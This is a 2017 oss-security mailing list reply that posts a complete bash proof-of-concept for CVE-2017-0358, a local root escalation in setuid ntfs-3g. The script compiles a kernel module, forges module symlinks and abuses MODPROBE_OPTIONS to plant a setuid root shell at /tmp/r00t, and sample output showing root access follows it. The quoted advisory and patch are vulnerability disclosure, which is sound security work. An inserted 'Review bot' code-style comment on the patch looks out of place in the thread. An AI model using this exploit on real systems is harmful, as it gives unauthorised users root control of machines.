Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence
 vulnerability via environment variables

#!/bin/bash
echo "@...@...@...@...@...@...@...@...@...@...@...@...@...
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@...@...@...@...@...@...@...@...@...@...@...@...@...
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "

cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen
<kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");

int init_module(void) {
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want
to patch your system!\n");
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t;
/bin/chmod u+s /tmp/r00t", NULL };
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
  return 0;
}

void cleanup_module(void) {
  printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF

cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED:
linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null
1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have
root. Don't be evil :)"
/tmp/r00t

echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@...@...@...@...@...@...@...@...@...@...@...@...@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@...@...@...@...@...@...@...@...@...@...@...@...@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF


On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE, does not scrub the environment before
> executing modprobe to load the fuse module. This influences the behavior
> of modprobe (the MODPROBE_OPTIONS environment variable, and the --config
> and --dirname options), potentially allowing local root privilege
> escalation if ntfs-3g is installed setuid. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem has been in the source since 2008, maybe earlier.
> The fix is easy: use execle instead of execl and pass NULL as the
> environment.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref        2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c    2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
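Review bot: Passing `&env`, the address of a single NULL `char *`, as the environment argument of the new execle() call is correct (it is a one-element, NULL-terminated array), but it reads as though a pointer to a scalar were being handed to the exec and the `(char*)NULL` cast on the declaration adds nothing; `char *const env[] = { NULL };` together with `execle(cmd, cmd, "fuse", (char *)NULL, env);` states the intent directly and also gives the variadic argument list a pointer-typed terminator rather than relying on how NULL is defined. The same pattern appears in the ntfs-3g.c hunk below and would benefit from the same rewrite. A short comment on the declaration, such as `/* empty environment: modprobe must not see MODPROBE_OPTIONS etc. from the caller */`, would record why the environment is deliberately dropped for a setuid invocation. The enclosing function starts before this hunk and continues past it, so the later uses of `req` and `fstype` are not visible here.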
> --- ntfs-3g/src/ntfs-3g.c.ref   2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c       2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
>         struct stat st;
>         pid_t pid;
>         const char *cmd = "/sbin/modprobe";
> +       char *env = (char*)NULL;
>         struct timespec req = { 0, 100000000 };   /* 100 msec */
>         fuse_fstype fstype;
>
>         if (!stat(cmd, &st) && !geteuid()) {
>                 pid = fork();
>                 if (!pid) {
> -                       execl(cmd, cmd, "fuse", NULL);
> +                       execle(cmd, cmd, "fuse", NULL, &env);
>                         _exit(1);
>                 } else if (pid != -1)
>                         waitpid(pid, NULL, 0);
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS



-- 
Regards,

Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen
